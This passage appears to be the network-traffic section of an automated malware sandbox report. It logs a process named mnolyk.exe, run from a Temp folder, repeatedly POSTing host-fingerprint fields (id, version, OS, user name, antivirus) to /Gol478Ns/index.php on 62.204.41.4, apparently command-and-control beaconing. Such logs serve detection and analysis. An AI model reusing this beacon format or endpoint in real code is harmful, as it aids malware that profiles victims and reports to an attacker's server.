Feb 7, 2023 19:58:37.060569048 CET	554	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
329	192.168.2.5	50040	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:37.231251001 CET	555	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:37.294770002 CET	555	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
33	192.168.2.5	49733	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:13.945818901 CET	161	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:14.009073019 CET	161	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
330	192.168.2.5	50041	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:37.467492104 CET	556	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:37.533015013 CET	556	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
331	192.168.2.5	50042	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:37.715383053 CET	557	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:37.778399944 CET	557	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
332	192.168.2.5	50043	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:37.945631981 CET	558	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:38.008440971 CET	558	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
333	192.168.2.5	50044	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:38.182719946 CET	559	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:38.247263908 CET	559	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
334	192.168.2.5	50045	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:38.414557934 CET	560	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:38.478013039 CET	560	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
335	192.168.2.5	50046	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:38.668972015 CET	561	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:38.733588934 CET	561	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
336	192.168.2.5	50047	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:38.899810076 CET	562	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:38.965450048 CET	562	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
337	192.168.2.5	50048	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:39.136452913 CET	563	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:39.201817036 CET	563	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
338	192.168.2.5	50049	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:39.386684895 CET	564	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:39.449786901 CET	564	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
339	192.168.2.5	50050	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:39.622153997 CET	565	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:39.687675953 CET	565	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
34	192.168.2.5	49734	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:14.182238102 CET	162	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:14.248008013 CET	162	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
340	192.168.2.5	50051	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:39.861263990 CET	566	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:39.926196098 CET	566	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
341	192.168.2.5	50052	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:40.105000973 CET	567	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:40.171942949 CET	567	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
342	192.168.2.5	50053	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:40.354567051 CET	568	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:40.422944069 CET	568	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
343	192.168.2.5	50054	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:40.604509115 CET	569	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:40.668494940 CET	569	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
344	192.168.2.5	50055	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:40.841197014 CET	570	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:40.907582045 CET	570	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
345	192.168.2.5	50056	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:41.093534946 CET	571	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:41.158943892 CET	571	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
346	192.168.2.5	50057	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:41.341645956 CET	572	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:41.405617952 CET	572	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
347	192.168.2.5	50058	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:41.573760986 CET	573	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:41.636914968 CET	573	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
348	192.168.2.5	50059	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
